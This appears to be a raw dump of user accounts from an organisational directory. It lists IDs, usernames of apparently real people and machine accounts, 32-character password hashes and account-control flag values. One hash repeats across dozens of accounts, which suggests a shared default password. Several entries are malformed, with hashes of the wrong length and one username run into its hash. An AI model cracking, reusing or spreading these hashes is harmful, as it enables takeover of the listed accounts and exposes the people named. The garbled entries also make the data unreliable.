1361 howelam 71b43a8306d1bb60e84a0bc2400a5a21 514
1637 sbklein 45bd8db3b86d6a8b84fe7207cf2947ed 514
1184 ajmarfsu 860e03409ab78f44104caedfdc8828cf 512
1268 beverlyswanson 413995a825f8b6a0e5a834b0bdb47e83 512
1786 todd.test 782d1e5173aa367fe33e7e053beb33056 66080
1200 jlolson c3fb49594fecd04eb9f48f7ba427bda8 514
1712 dmwoldhs 57f3f7aa8bc515d493f9be1e451ad62a 512
1234 drwambach 0c4913e8c53fe4b010dfa6912537259d 512
1790 drakahara 48a83263e1c057daea02a7cb8e176eb0 512
1214 drkowitz 0172551e7970180b30fc40c267022f90 512
1670 aenorling 1f65c8fe7ee03766746f7bf6a2660326 512
1752 harsjlfp 59d6671166815ebb331ec92c8d0d6fd0 512
1676 l_roched cf42d09286c840daa07184cfb88c2b0d 512
1782 drbrady b22ac831efdbed50fd58d999b85901a5 512
1169 jeskilcc 71b43a8306d1bb60e84a0bc2400a5a21 512
1694 c_grotmu 83aa2cee51e1820b81117b7b24ea1277 512
1794 srwolemn 71b43a8306d1bb60e84a0bc2400a5a21 512
1213 drjoo 3a8413d12bee65e418af57e98a50ce401 512
1331 kmcarlson 71b43a8306d1bb60e84a0bc2400a5a21 512
1343 blfinksu 71b43a8306d1bb60e84a0bc2400a5a21 512
1645 maseivxr 0f1441e83d371915a7d51d151eae4e0f 512
1380 drm 71b43a8306d1bb60e84a0bc2400a5a21 512
1704 j_hallmu e79ff7c7b9a43a4f8f90373a22473330 512
1384 kmkoep 71b43a8306d1bb60e84a0bc2400a5a21 512
1385 seanmcdonald 9b908fe25801a0c4b58fbe51356c5511 512
1793 drjamison 42286d96f65b34de624c721fc0811e 512
1387 drdorr 71b43a8306d1bb60e84a0bc2400a5a21 512
1804 drnammour 71b43a8306d1bb60e84a0bc2400a5a21 512
1803 jeggers 71b43a8306d1bb60e84a0bc2400a5a21 512
1332 kmpaulsu 71b43a8306d1bb60e84a0bc2400a5a21 512
1675 pmahlsed eae0eb74a1fb7f1650235564fe53fd87 514
1389 suhlig 71b43a8306d1bb60e84a0bc2400a5a21 512
1806 lngervais 71b43a8306d1bb60e84a0bc2400a5a21 512
1278 emilyanderson 93c6701c7cbed0e3023f9d8d4040d9c8 512
1821 cjhagel 71b43a8306d1bb60e84a0bc2400a5a21 512
1822 jnericfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1823 vwayres 71b43a8306d1bb60e84a0bc2400a5a21 512
1178 godtkesu 71b43a8306d1bb60e84a0bc2400a5a21 514
1238 pkutter f2dd7e09b601b1150a125fdf837ecab1 512
1814 lmgreesu 266b440f052f39f8b5085d46cfa8664b 512
1791 drpierce 85fea9b4d7122aa17bdc9eac23d67cad 512
1333 cjshockley 71b43a8306d1bb60e84a0bc2400a5a21 514
1393 drspeltz b11f4956811fd50e573fa91c3e06e7ff 512
1778 retz 71b43a8306d1bb60e84a0bc2400a5a21 512
1179 jbclassu 71b43a8306d1bb60e84a0bc2400a5a21 512
1831 klugert ba70d3be0d0794f0b6a4158e6ef5419b 512
1830 eanderson 157aaf2b5e766f4e3f41e9f65e4f1f16 512
1374 cgerhardson bf6bb7d7ae3ccdd414b9503133f2c9 512
1406 jhkhan 71b43a8306d1bb60e84a0bc2400a5a21 512
1245 mbraaten 71b43a8306d1bb60e84a0bc2400a5a21 512
1209 dretzell 71b43a8306d1bb60e84a0bc2400a5a21 512
1410 droppenheim 69aec82d520250d0ef7dd129b1b59f79 512
1372 kmisemer 66e9ad66103e96be56bf6595c97e847e 512
1407 april.hoaby 3279750c1b635b210f49a078f65ba504 512
1789 jbrown af16e20cecbde59670d59cc6bcf59895 512
1408 mhewson 4a15b1e5cc804fc563e92fb1cc2736ee 512
1186 ecklpasu 71b43a8306d1bb60e84a0bc2400a5a21 512
1400 easalata 71b43a8306d1bb60e84a0bc2400a5a21 512
1257 steramsu c6886c68ea545b39393356e21207c9ca91 512
1795 heidi 638579b8a17d0127b57bcedc6976eb76 512
1840 debstone 71b43a8306d1bb60e84a0bc2400a5a21 512
1841 kerridolan 71b43a8306d1bb60e84a0bc2400a5a21 512
1175 andekmsu 76bfcb4fa2358c890592c5d4a956aba0 514
1818 n_shorfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1843 drhswenson d1114a3e69a780a03f502ad29efd14ea 512
1753 kaholec a1467e26a9c0b09f6a828ddb09ca0695 512
1412 jkasowski 0123bd3c30a8631aabff7117b1231f35 512
1207 drcrintea 1d23b0251eff76781cb8221ab962a767 512
1663 sjseabor eda257f668850270be069bc300b44f08 512
1181 dcgolosu 0e2cf0faf8915da9729e54cb96acb1186 512
1832 eheath 27ba1a95ac5c9719fd458ee43456d29a 512
1801 lmoore bc26ef0fa677cec9695257fcaabac38d 512
1824 tlbarrmu 71b43a8306d1bb60e84a0bc2400a5a21 512
1330 cjkurtxr d78ed82380a53851bcbdfb612c6b8b8a 512
1409 cweber 4d64ef67135fecc5bb20918df8b38ae 512
1826 vaross 2cb05598cb564216b64bc7132e5a3c17 514
1813 zielclpt 71b43a8306d1bb60e84a0bc2400a5a21 512
1269 caroljohnson 8b811002cbb05013271c130234f109ce 512
1388 bmayfield 72f5710f8901495212b162c9f4c0688b 512
1732 rcmgr 6d0b7222e3b4bc3075bbf8d242de10f0 512
1692 boseklmu 71b43a8306d1bb60e84a0bc2400a5a21 514
1746 ljrognbi 90ff62734f34b638a23a90096ebd83f2 512
1848 rthomas 71b43a8306d1bb60e84a0bc2400a5a21 512
1419 nygaard 74138648db6c91f3b109e33af2b67490 512
1849 daniellewest 71b43a8306d1bb60e84a0bc2400a5a21 512
1335 knjohnson 71b43a8306d1bb60e84a0bc2400a5a21 512
1350 glendahoff 41a0cf95ef2cd698846d4206e2150aea 512
1302 brennasu 71b43a8306d1bb60e84a0bc2400a5a21 512
1193 kjehlert 71b43a8306d1bb60e84a0bc2400a5a21 514
1825 krstenstrum 71b43a8306d1bb60e84a0bc2400a5a21 514
1634 jejohnson 71536fe0fcc8422e94815f0cc437f8ca 514
1857 drpahk 71b43a8306d1bb60e84a0bc2400a5a21 512
1859 drhoffman 71b43a8306d1bb60e84a0bc2400a5a21 512
1860 drmhoffman 71b43a8306d1bb60e84a0bc2400a5a21 512
1863 cconduah 71b43a8306d1bb60e84a0bc2400a5a21 512
1842 speterson 259ccc44e8d8285d03308e1d7a3950f4 512
1189 gjryansu d973bcbafd3c71be5a1d5770b0cc108b 514
1183 mrisaac 71b43a8306d1bb60e84a0bc2400a5a21 514
1695 imlundmu 71b43a8306d1bb60e84a0bc2400a5a21 514
1190 dmstorsu e9a3bb1f8098d80e1325a6450acd498d 512
1845 mhasbargen 1090fe654dada75e3b7ccf74536492ed 512
1182 slhanssu b333890541d008501cf2619854d23ab8 512
1864 ttomlinson 7a21990fcd3d759941e45c490f143d5f 512
1376 drmcguire 5e8d031f68497f6e5021a790bf98e88e 512
1632 adhoepxr 69e463660e9f2abd43f7b54c2bd1f903 514
1401 drlonginow 16d99248b55a4a6545926a6f69d0f347 512
1427 kflemming 4a57c663416c16cc53f6625fda9713e9 512
1433 drgreatens 71b43a8306d1bb60e84a0bc2400a5a21 512
1221 jmitchell 71b43a8306d1bb60e84a0bc2400a5a21 512
1220 drmathison 36f8dee2ff0c6e543fd59c047f67c8d2 512
1201 dramundson 2a6ec2a808ddbb99cadf6d39e7ba10c6 512
1308 suehalvorson bfc33e7d7b1e1280e400e373314d3712 512
1720 thukkelberg ff60fbd62ec55db9065eecccfe8524db 512
1355 sarahnjos 8f59bbde2fd4f043e4c594fb949244c7 512
1394 aprilklimp 37b6aa4b892b68833f76a686647aeb93 512
1423 ashleylee 71b43a8306d1bb60e84a0bc2400a5a21 512
1851 tlarson 88867e83b76ac69ceff784f925c357bf 512
1437 drkahn fe8d33fc9cc21bd07b00febad40b9975 512
1386 edxray 71b43a8306d1bb60e84a0bc2400a5a21 66080
1344 anthonyaukes 97c7950753f28e3a0f3a5e1178e56a7b 512
1426 dneumann af97d4341d4e18cc86e7c5076910e691 512
1846 cldrevcc c66291f650232a5bf895a6729a354f0b 66080
1440 drengel 8f7c50ac5a16ea232e68219ebd4a2765 512
1873 mertesatxr 507388d7f5c9518cd213ba4d399dd534 512
1444 drsparacino 1bd1934e3efff393f5c41ca4defebfc3 512
1432 dnbeddow 961f4bdcf7eb72d71189c77c13f0b012 512
1176 surgmgr 8702ce315ef73fc3ece784001eb9928c 512
1391 drlee 1164e4a62a58f4d9f9f12f49c8841ff7 512
1218 drlocsin ddeb34a0b9aea78e864b28b6eb4735fe 512
1678 plschmmu c5f0862b2291f4f4e8082476375e8750 512
1852 tvogel 3acb51681be036c664ffd76c1d3bf0c9 512
1422 rfnorgren b88444c9d650771957bb82fcf7bc89d2 512
1858 drhegarty 71b43a8306d1bb60e84a0bc2400a5a21 512
1425 kjoleary 40132a60cd6f22212c8a527074a0a69c 512
1876 teraoye 84440338f26bf725be78c015f7d62c88 512
1838 abourassa 5d82f96da844c0bc97f6370935076591 512
1403 msshulka b9f917853e3dbf6e6831ecce60725930 512
1622 jmberg 8d1e3c6c096ed034d091bab932595813 512
1435 kperlinger 71b43a8306d1bb60e84a0bc2400a5a21 512
1708 aegrosfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1868 ceverding 7bdf56b0c8cc9bb83518f19e7a68448e 512
1669 clnelssu 1106714dfdf3328364bd1dff5b8c6fb3 512
1228 drsanderson 5c385f430d1f6f29116929882f3ac87c 66048
1418 vogt 027327890c652b43c998a5f79f63e6f9 512
1458 aolson ab6a501de2b1f760f4de0134e97b42aa 512
1883 afaulck 71b43a8306d1bb60e84a0bc2400a5a21 512
1438 billcarr 2d786d35aa24f295a4c16cc376823c20 512
1163 bklarscc 5a40ed8b78cf6ffd60359431b0bf16a0 512
1273 cahayden a0ceddbb1aa337c1af6b4d94e28ba584 66048
1327 kimgullickson a26a70472ac72321c39702424876eb9 512
1417 tommklsn fe09f58bc0b02f235ef16607f930a733 512
1457 msimon ca94efa04ff9cd46bce17ab37c7921a3 512
1853 bfischer 84bd2e8898162d7ab24b6de777affcb9 512
1850 ehaanen fb3a22f143f41255b89bd38c7ba07b86 512
1462 akconklin 89268eb0de4473918033f6b1fc68411f 66080
1261 connieschmidt 65821c4bc2d72044ce0d3f0fa2501916 512
1890 hoekljst 2a1bcb1c0b084375aeb67da26184e521 66080
1891 stantdst 5e169f4be14574721b835902689f9d50 66080
1375 drweems fc45ba277cbf3ce7a388e7100d0b7305 512
1373 grouw e7293202fd61f34b61a0b4baa02fe6fd 66080
1742 mjbjerbi 82bb2b0b540987253accfb71d1f62692 512
1455 tbachmeier 983ff0e9ad101c900da0c5bc733d5e75 512
1856 drbeehler acb98fd0478427cd18949050c5e87b47 512
1456 ljohannes a0003484e0d07e930556770c165cec6c 512
1404 eghaglind aea6119a95655f1cd8521a7a0a4b7fe0 512
1776 jdjensen 59e4e057226b31a183e383abaea7c6d8 512
1468 marshallklein beacd80369761138f6bb0aab8fc6210e 512
1474 drhamilton 71b43a8306d1bb60e84a0bc2400a5a21 512
1881 drhossain dba25b00fc0118977cef8471aa9c82d3 512
1211 drhendel f1d8e19769e696ca0b78eaab38e2255d 512
1395 drschroeder d9d8d32b8137cebc5e457103422ccea6 512
1469 angelbarnett 727112bca3218bd419fe1cce82de62a4 512
1900 cborneman c88ea1a1c1e7d82b29fe4377d18bcd5 512
1479 pehaberer 596b4baf59fca2aa4ed4f573be026fa2 512
1452 ebeauchamp 0502e7a5bcc435cb35693cf38a4fee8f 512
1478 slschutt b7e6fe1aa6d609cb1fa8aac5dcdf3acc 512
1897 orourke67 bc6e72869afdc91a67bc43e10f7094dd 66080
1908 mhockett 930780c4c40cde7420cd6d4a305ee5dc 512
1185 lmmillsu 8ed2c1b2953497e077f462f7ab4084e6 512
1251 krouw e7293202fd61f34b61a0b4baa02fe6fd 66048
1769 jmcarrsu 13509376bb407cc458585951708f27d3 512
1750 wkandebi 7bdc68efb1f39079aadd98b0304e2c27 512
1914 danelson edb0f053f8d7bd5295585d63f208f4ef 512
1351 angelabradsteen b0d18851aaddc665883a0c2fc3eb1f95 512
1486 draphrem 71b43a8306d1bb60e84a0bc2400a5a21 512
1861 cmitzel 70a75fc03a0a6727463de3fe2b3c56ff 512
1918 drsiruno 71b43a8306d1bb60e84a0bc2400a5a21 512
1304 pattell 36c71052cc9f3df09b42f66f537ce603 66048
1485 kolsen 05acb3279db9544eba15593253698ed2 512
1792 gkaplan 8d1a7f3e785301eb112b1c789f56c3a7 512
1924 smcgaughey 71b43a8306d1bb60e84a0bc2400a5a21 512
1800 bmremund 30d9347d957dffe3c1aa15ab36f6eb12 512
1164 s_martcc e98664c8af176f206d9c9a34b98b1e6c 512
1488 sbuhr 1ca6d0d3c253161bb3e45ddb1219709b 512
1913 ksherbert cfa9e1825e538868e223ce860b2c0909 512
1492 lafladeland d3f8d051fee5fab0dcfda3645ad326b7 512
1892 mwalker 93bd4c9e8882bea66b1fce8c8f58e10b 512
1460 btrontvet 95a607aba41d7dc1f32ffdbc5c122191 512
1684 g_krophs c19bb385844e62aeb63d1cab15ce2bf0 512
1442 jljerger 71b43a8306d1bb60e84a0bc2400a5a21 512
1493 cdsilas 2d2d675a0940926815c12c5c76cd5643 66080
1664 maswenor 3ae2748c03bf865aca895ee900e382c8 512
1496 dncreager 9e0f6c8bd02484863153490417381184 512
1915 kanelson 35dab29d6dae351fff051348c4bce1ed 512
1436 ktrue 058405257249b0c11ec365f8a6370982 512
1499 ahqarni 31963a3237190431525995eac7c19763 66080
1871 drjaiyebo f8f0483906c24c4068df7a3589d10da9 512
1933 gwong 628f45205d05822f848f8ea4683035f1 66080
1802 drmckee 7a8918a1fba8966061eff9738cb49e03 512
1903 ajboock 12daecf4f46efdcd3d1dcb66be685211 66080
1501 kjschonhardt 9e0b975a698164cc445b6590b478d9a8 66080
1113 colorcal ff5bde13f83d41f71ad00d7746bc74c3 66048
1132 calcxtra f8d047478c9fbb7c5fd6172f7e7148c4 66048
1503 bas 048d01202d68f356e0f7c22e12f45179 512
1337 tjhein 71b43a8306d1bb60e84a0bc2400a5a21 512
1157 a_attecc a5c622cd84f1af87c6bc9e34f348e553 512
1902 bjwalker 44745e179dc7e96cf050eca9012c6c80 66080
1819 jhmathew 71b43a8306d1bb60e84a0bc2400a5a21 512
1904 babatunde 71b43a8306d1bb60e84a0bc2400a5a21 66080
1398 juakbar ac4358090ce0ec69de96941b9159effe 512
1940 alexwong001 71b43a8306d1bb60e84a0bc2400a5a21 512
1930 afclark abaa74ccce04f1aef62f0034b526d76d 512
1405 eghide b7297b0c9a30de3c0cdc87b5d3f688a7 512
1504 roxanneh 1ecba2e0469152720045def76416c8e6 66080
1495 rachelvoll a3397279e951697a4d9746231c9baf97 512
1937 lklevberg 6af5c89fabf8460a0281e7045c05d95c 512
1944 abeachy 9eb9ce5359d0d219636287eea5715766 66080
1369 drjibben d2bb7bae3a812554e6560a80bf8c0d7d 512
1783 drwhitley 6df025ce8b176733799affc44a20a202 512
1743 pkelleob 6b0b3bccf6939dabfd45089122d67bc6 512
1916 ahasling 346e634f32780e32afc8e0af7b50b882 512
1512 ftlasala 089baa6e44b9f73e9dc07a440c531c96 512
1177 djmoensu 6cfc0d4e4a46bc30cd9ab35d709058af 512
1931 mjansen c5e7e74db335524b2231d823efbeeef2 512
1949 tdebrito 71b43a8306d1bb60e84a0bc2400a5a21 512
1950 fkarsnia 71b43a8306d1bb60e84a0bc2400a5a21 512
1951 dwinans 71b43a8306d1bb60e84a0bc2400a5a21 512
1958 emedini 9674fbff3cfaaf66f4d997c889a8441a9 66080
1948 jzosel 71b43a8306d1bb60e84a0bc2400a5a21 512
1941 jsmoza 333dacdf4114b5c91dac43802a36fac9 66080
1198 gnthorp d147b5251d854e35c0f453690eb6f92c 512
1960 maakinyemi fab06fb7e4efb6a185c40f5e84eeccbc 66080
1963 mnhasnain f0f75ba30b39a4f952d09c0887e9f08a 66080
1938 bwaite 2f3d525c6bd8e700a68f44ba6460eb4e 512
1947 jstageberg a686c0c3a2580fcd62c1f5c311293ad4 66080
1516 anmorimoto 984b3943b1222418e0b227338c1702e3 512
1662 kkschabi 8fc0da975463b786cb63a655b7c7ba16 512
1517 ctmn00 9e9b58c2ac713d2ff083ae568bf40d6c 66080
1968 dsstclair 55dc4b979fed2985f9180d1ba427c817 66080
1489 parkin e1266a7e4dcf5e7064c76047a561c7e0 512
1368 drbrown a490b356a1f039bc5d02b07a51eb7caa 512
1971 jak c59508253f1ba8a772ea7b39cabcf7dd 66080
1972 jmehlert 777a4677299f8631c379d2ac18ce4830 66080
1974 hjschwartz aa2ec5b61be663b1ba420069b8b7d644 66080
1976 sllang 5821f9c48a246bac75e67390c51d7221 66080
1121 NWKS1$ cdac73fa5c46121e947253723c207d180 4096
1122 NWKS2$ 380dc1a1758e385f05b1757caf83e053 4096
1970 hottenbacher e957cf961db72e8b18461f42b32b8307 512
1120 NWKS0$ 7548ee60d9258efe0b68c20326289b4c 4096
1208 dreisinger 26c5286aad4cc5a67d6c1b498ba66878 512
1339 kaanderson 4b1dd37505ef1dae700f315e3971c75a 512
1298 marylouolson 22958710c569d1fa791f43aba4d4e9ea 512
1977 slmcfarren c42527f7be2aff1c302f881d8174a910 66080
1982 drdussault 71b43a8306d1bb60e84a0bc2400a5a21 512
1526 tmnyarandi 71b43a8306d1bb60e84a0bc2400a5a21 512
1525 grweischedel 4438bcb26b836b0339de5a6f2e66ffd0 66080
1981 oomokhodion 34edf9d3e7c66c79ccbc6225730a81d0 66080
1665 k_jordor f6212a5ae87201fe42f9d891d322cab9 512
1451 mjbutcher fcfcec23f19252d7417693e9819d8a37 512
1528 jjrigby 6ace8f289143d7bb6e5f12aadf93676c 66080
1482 lvogt 8626c1417d2543e499a70055697de1cc 512
1899 bhuotari 91f0894b363984686d7f3f32a681fe07 512
1487 bhydukovich 440921ebded7e97a4b91624abfa12058 512
1531 lavierra 315518d92657659650692e8423d3bdb5 66080
1763 d_debror 4ba24a6ef06cc00b505db9948ff695e4 512
1522 remartin 5a754961d0cd7e31f078484ff86d673b 512
1509 awells a4043550c328b3ba9832e6f755fabd24 66080
1533 dsunstrom ef270a89b56d96ef597a8c29f306b2b9 512
1481 jnistler 602a005eddfd365e04e4db27038f6c25 66048
1537 tdozak 02a7690cbb5ba35f67703ff8ff0251be 66080
1896 fmitzel 0a987196697088eefbbd958fc5bef859 512
1480 ahopkins a54ed711f34b55cded8fb5b64ead0b4d 512
1920 tjlind 73cd1d8f36c225301f1395a68644e91b 66080
1747 mlwicker 75b21858169704679e44b7de9485381e 512
1311 susanwoessner 11e81c29d73b8b739d48574bf0aca075 512
1994 smzak b7cfd41fe075a15963664b2459faa455 66080
1993 jmjohnson 530a7f8e06360c77afb7b16cfeca5584 66080
1992 ahaseeb 221ddc7e89d6ef0a69bbfa241379808a 66080
1991 amguyot 0fffd31fca8b05a4beaab0efc2bdbb42 66080
1990 jmgrudem f477b0398e548a8b526eee322df6c6fd 66080
1989 bjdavis 750c52d81089f4d5d662e82425fa7890 66080
1988 saung 5567e9bf2f46d7951f2a9660c0b48a77 66080
1956 toberg 74dc5c8262a0a22130c6aee81dca267d 512
1463 mebruininga 12050de9174a28b116fd22989bde2b10 512
1969 seharte 73a5ab74fb4af9b2562c7e0ccaf24e04 66080
1962 evavo012 c7105347e9a12d44934ed8f1b86a963c 512
1688 basillerud 85d9373449b9dd9457b3ba5bad1e18b8 512
1995 rpmontenegro 91214c29730b425f9254efdcb2e98894 66080
1996 jmmayland 66b3bfc3e9ccf7bfa5908978985b1a8b 66080
1998 skramsted 54dba8a6ef6f4180785f97a926fdb929 66080
1999 tjmohs 8e1140495086fcd954b5dfa1682d8853 512
1540 drfreeman 38c7a4d796a3bc428467097c66a7824e 512
1490 ncarlson 13d20ae7b8d1edd2a5cc2a4850dec98f 512
1954 relder 23eb25e4307a4c774c553792b29f8b 512
1518 dstclair c405a94abdb3e08736a8250e609691b5 66080
1542 djharms 4646a25232b9877c8b4cede7a79054bd 66080
1411 drellison c3b00a190a99d9f3b4e415d11491a9a2 66048
1543 pswasemiller 69246f6d972a33a4d250819f1c4c4862 66080
1547 ajstasko f3973a2a5b3cc520f11d6d5377c90887 66080
1539 adweichelt 33c88da77d69a77464c22a01fd52cd23 512
1671 k_demmed 31e8cefef1084db5c465273ea21e2b89 512
1498 jlbaldwin 8afae19cb75a9938e93e0d64185cb1c1 66080
1497 jpull 2003a86bc4317ae69c3a94df2e34271b 512
1532 arpicker 1bde10801d22449dcffb76188c626bb6 512
1473 drehler be64f8fc4124dd98cde17a19cb48acce 512
2003 tthuyn 74f754c71bc591379ba8d9e2450ae76c 512
1467 ratinsay 8a6d1d02b5f1ae79d48adc0df621f699 66080
1309 smrodriguez afde914ef03a7f99c1e400d70451a5c2 66048
2005 jrglyn 5d75661d8a53ce0417d1b6749673b16c 66080
1877 kpederson 051e63a2e0111187dfc88bc27a3bebde 512
1272 connielokhorst 431b4387576ef6314152a56f3e9e89c9 512
1736 jlindgren 0b048129c6801a30012c877dfa365985 512
1927 hrabbasi 522dc460c454db1afb366ea21bb28249 66080
1557 brhils 9c8ef96d93ff6e98dafd1dda813f015f 66080
1558 gzike 71b43a8306d1bb60e84a0bc2400a5a21 512
1711 njrundmu 3962a1c5095221bd197b54359b1eea4f 512
1561 snkent 8e4f2b090e863e4a4ab746266f395f97 66080
1562 nikreit 61bf357d002e67b6a4368816b3070056 66080
1788 dreelkema 71b43a8306d1bb60e84a0bc2400a5a21 66048
1563 mvseverson e8b5663e5c7d55253644c62d078a01e9 66080
1194 ejmoir 5add8cc48ec47eb612ed4c225935726b 512
1556 smturner 493e7347661f5df50e12d38cf45a7a11 66080
1566 bbbarnstuble 9077ca9df2f813557f61436eddbd1617 66080
1983 cdlureen 36192c3f8a11b1cc743d45d30c12b039 66080
1303 phokanson 71b43a8306d1bb60e84a0bc2400a5a21 512
1397 ijchitu d53fa7b4a7afa23d6959e9a162f594bd 512
1421 drknutson 71b43a8306d1bb60e84a0bc2400a5a21 512
2014 sbatra 40fc2f1989e9062550bf0aed5c737947 66080
1640 cml 1bc33e42cb19a792844b7fb6dd04fe9d 512
1310 susanschlueter f3e6b2997d0aa15c50e8dd0ee057882 512
1470 charlie44 53da6be61082ec74b099dceeb80cd75c 512
1898 lroehl ed0b817db13e1848e1b4b5881ba27e05 512
1564 seknutson e768dfefaf663c7662405337f32557df 512
2012 mcbressler 15701ec0d0df81b920df1285e038926a 66080
2019 abjolley 72551678e0cb74c8157833428afbfd87 66080
2022 inansine c989196e3f82c855bf256c926344231b 66080
1170 emlodicc e25144ddc66a1e65d6025c687a363c80 512
1570 grhyland f7f2f14d1571ad848b5caae0afe576aa 512
1986 alako 97097d2962cb4b3dd0e0ce12aff3ad 66048
1952 adool 2ddf823d166e7d8769a76a9b9963e980 512
2006 bboom 56ff6b4a94bb106bc53ed861131a084f 66048
1953 pappelget c1287233b1dae2ae1cfb93f65003358d 512
1356 beckyhensch 6e5e3967d92ddbde06e26298c0648194 512
1679 osmotkfp 50c877f12bb3ab3a1ae0c90967f4e97 512
1836 staceyswiontek ddd1940715650b21ad48c5ba67adcc38 512
1987 akuhn fc88bee9b0c17ca524adb09ecc8b805d 66080
1955 awohlenhau a75fae5b4c80180977b062a2b01f1187 512
1534 baagard 0290400c405abaf5a5f6c862ce7ba8ee 512
1124 NWKS4$ 002d632e95effc6793cba7fe5dc65093 4096
1578 kklabo 715b5362db34d6acd654e0a1763483f9 66080
1577 klringdahl bf8e69157a193c800a66b83c8a9df864 66080
1364 NWKS11$ c0ecff2a6454d92cd29619414c879ffc 4096
1362 NWKS9$ 7c148e919425e07f48df098d481d91eb 4096
1123 NWKS3$ 7ebe7393bbd374e6161fcae2129aa660 4096
1130 NWKS10$ f245c27b080ceef5f43f5202aa80e5de 4096
1382 NWKS12$ 366eaea8e999f9b72c7d40ee8819ed2a 4096
1128 NWKS8$ c8d0b8661825257099bbea223526b4a7fa 4096
1156 t2 00e05128adfc76f8abd66588f9a5acf7 512
1111 backup 6817c701afdb1af1fba708761c2fc56d 66048
1154 test3 5af3584b3dc373f54f88c04f9bafc4a3 66082
1133 demo a80fdb8db842a99d87ef3d857f8ddcf1 514
1429 trthormodson 55a87b3f01b7be6d6fdd2e8adfd5f7dd 512
1127 NWKS7$ 25051c3d18bb3cd72a2eac82e43ce515 4096
1126 NWKS6$ 540b1aea40c7862d081dfdd9191dab69 4096
1125 NWKS5$ 02552a5f4bc62a86aef7991040415156 4096
1242 drkim 4a89fabed90f8bdaad4c3b5f9849d0da 66048
1116 NSTORE0$ 2fee332c247d4950ee9a515b30cf1332 4096
3605 dummy d1856f76c1ad69d2f9fd1cb4d184cadb 66080
1285 juliedevries 3286bbe80dd8a5adb29271452d3a25 512
1727 j_herzrc 71b43a8306d1bb60e84a0bc2400a5a21 512
1529 dmarsolek 0d9abd5da9c1866c5bd831210a492743 512
1114 NODE1$ edae82eb008b0370092cf194246b2208 4096
1115 NODE0$ 0b0c7cac3d4a70b8a757bc22671deb8a 4096
1271 cfvorland e8254befc20061f88fa9f42a41e0c8dd 66048
1604 NSERV3$ 1b98c8261bc0b0e672d00be49f42848b 4096
1546 oaajayi 17ff2378c1e12cbfe599b888c1150ff7 66080
1775 machelleellingson e4f089a7c304f1dc1b780153ecd3f364 512
1483 gschwartz 9ce58ad20c46478fce080e997bb33d94 512
2021 nlnordwick ee4ea2f8de1cf636ccb2be6dad783ddc 66080
1544 smitzen e51624612bf604843c28b87c28d92cd1 66080
1305 sarahthormodson a39cda5325b0e788aa11340313ea0345 512
1443 crcolosky edebf24db8fd09f1a0f968a391cef2fc 66080
1812 ptmgr 760914937703f202577c78f561733b31 512
1975 kakragness 56e541a171ba2657f59d037c1eca01a0 66080
1973 loriv 4c3f522e7795bf6057839202b9217aab 66080
1939 sbt ce19b3c08eefb3c70f7ff8d635bca0ee 66080
1816 raisnf ef41696712216e5d6b18f34591f7e3ed 512
1967 drsullivan 28a07a24ca69c3096c371f83ed2fd6bb 514
3611 jmvodvarka 0988517aa5c0d23287f5531bd767bdd3 66080
3612 rdleach 305748acc942ce51ea160ffbda2559ea 66080
2017 jharren 73e28a16319bce0a219a862c9f204430 512
1500 skchristenson 54b9fc57d368b8ff2a7101acbbbe44fa 66080
1131 NSERV2$ d761fd6b7f26488f9698d91b7eaf1e1e 4096
1919 dlsellgren b6a7b4ccc18e78e895fdbc2a347d6798 66080
2015 ionyeka af4f10cee095a721eb8cb3f036df1c70 66048
1738 drwinans 71b43a8306d1bb60e84a0bc2400a5a21 512
1554 jmayer 787289804393737481268248227c117827 66048
1722 trheeter 0b05de3837e6ba3ce07be5fce98c6322 512
3107 almoe a87b3d76707861af97c27a27187819dc 544
1538 daseiple 4e74436540e598306b5b2ba9c16e9620 512
1513 mlwallsu 160a1427d98056bf150dfaf2fe48777a 512
1667 jagreesu e7cb8d48488e91ea0dd4548f574d6659 512
1761 jagreen eeda0eb9b71e405585858da0d7642ab781 512
2046 rmjohnson 289c0c451964e336712485cf8dbe4755 66080
1545 tmsevernak dcf92958c0599f683d18a8701d6efbd9 66080
2037 bellerbusch 1ce00366e6098db49075cab81822db56 66080
2008 fkness 5f43280579e5f5062ffb466c323b79cf 66080
1454 eaberge a25c8562b46b3d0c1533faac1dcde5ef 512
2050 nnwelle ab8daa583f3d0b371e69a77e6f572bce 66080
1459 bmharrington 854433a874acdb34b89038360951ce 512
3613 mmmorrissette ad7735963a7ca199196f8dc3a0cad73d 544
1882 jdmeyer 6c2f21eaeeffc12bac28d943d81901f6 512
1284 joanneness 0c49e463779481ef48b1f1feb997bf1813 512
3608 bhebel 2bdcad6d2082323222a291328ab4883e 544
2053 sselander 729e9ece532d9019bd9038ce881261d4 544
1291 lorikress 189991f5fe87e3a5a7e9e48d02d02ed8 512
1253 jlgaddie 347d96e999a64676c9867077c3def848 512
3111 sevans bccc9db3f8487cf2d7a5841b947e5352 544
1203 drasp 1281fdd45fab83c83c14909815968d7fde3 512
1734 bjneulrc d7a898205589c97a081ecfe4e1d03dac 512
1197 lbdrewsu 95c852590a06992b56dc18c19d8f7ff2 512
3619 amschuler 66c2ea682add1cedad28a54d2abe1e29 66080
1270 cherylbarry a9936d9ada4e566970ffab18ad878360 512
1381 pstoy 4f0a88bd21612aab75bbaa60de5a0ed3 512
1348 annvipond aa6a9b32f4966bd433a43775da85a4ef 512
2025 ajberger 8589f311be9a89f3f5cb9f25b7331786 66080
1264 amysund e81b0a2dd62794e47449df0069578e0a 512
2054 ahovet 71b43a8306d1bb60e84a0bc2400a5a21 544
1749 bramunds 08f433ddf0fc1ca21774d06679edf8bb 512
3609 mmorse92ea6607ee7c2e6d531767525ab897d4 544
1672 mjdethed 39ea5315b341f934298362c6d4a91c66 512
1762 d_buskor 3bc79616b3e5f0ff07e9cb3b1c15c681 512
1535 nreger a9c4f9d0547a927b2a3218803c8d7294 514
2013 speterson318 753e158458814722e2a683c683d5c8e97 66080
3117 snhoeper 0ad907fdfa4b6b97feb2958184664c5c 66080
1751 kageormu d1394916f03c58c542c1bd959d4f887b 512
1879 drhone 47e51872dc078c8816c4444e09cdc47c 514
3120 lamartinez f8661751b21896715d42b388a201e403 66080
2056 klvaughn 270ad290a806a2a58bb980f8fcaf6f72 66080
1555 jturk 07dcecd4742430e0327a34353df4e5fb 512
3113 hmckay 35e649e3253284b7cfdb7797ae18bc73 544
1932 ecokundaye 5cd2316d2043cbbe21c042ccb0062669 512
1560 mvagts f3b3687841a863b9756718138a65e0f9 66048
1559 jtovson f2d2c21e5cc948ad54cdc241cae398ab 512
2011 skhan 3c850a53e8f962d6d2db12ddafe2b38d 66080
